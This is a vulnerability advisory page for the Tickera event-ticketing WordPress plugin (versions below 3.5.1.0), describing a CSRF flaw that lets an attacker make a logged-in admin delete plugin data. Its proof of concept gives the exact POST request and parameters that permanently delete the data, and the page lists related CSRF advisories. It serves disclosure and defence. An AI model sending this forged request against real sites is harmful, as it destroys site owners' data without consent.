Tickera < 3.5.1.0 – Plugin Data Deletion via CSRF | CVE 2022-4549 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.

Proof of Concept

1. Navigate to Tickera Settings » Delete info
2. Delete info request intercept like that

POST /wp-admin/edit.php?post_type=tc_events&page=tc_settings&tab=tickera_delete_info

tc_delete_plugin_data%5Btickera%5D=yes&tc_delete_selected_data_permanently=Delete+selected+data+permanently

Affects Plugins

tickera-event-ticketing-system

Fixed in 3.5.1.0

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

rezaduty

Submitter

rezaduty

Verified

Yes

WPVDB ID

06e1be38-fc1a-4799-a006-556b678ae701

Timeline

Publicly Published

2022-12-23 (about 1 years ago)

Added

2022-12-23 (about 1 years ago)

Last Updated

2024-01-26 (about 3 months ago)

Other

Published

Title

Published

2021-07-06

Title

WP HTML Mail < 3.0.8 - CSRF to XSS

Published

2023-11-15

Title

Elementor Addon Elements < 1.12.8 - Settings Update via CSRF

Published

2023-02-22

Title

Auto Affiliate Links < 6.3.0.3 - Settings Update via CSRF

Published

2022-07-28

Title

ЮKassa для WooCommerce < 2.3.1 - Arbitrary Settings Update via CSRF

Published

2024-04-11

Title

ELEX WooCommerce Dynamic Pricing and Discounts < 2.1.3 - Cross-Site Request Forgery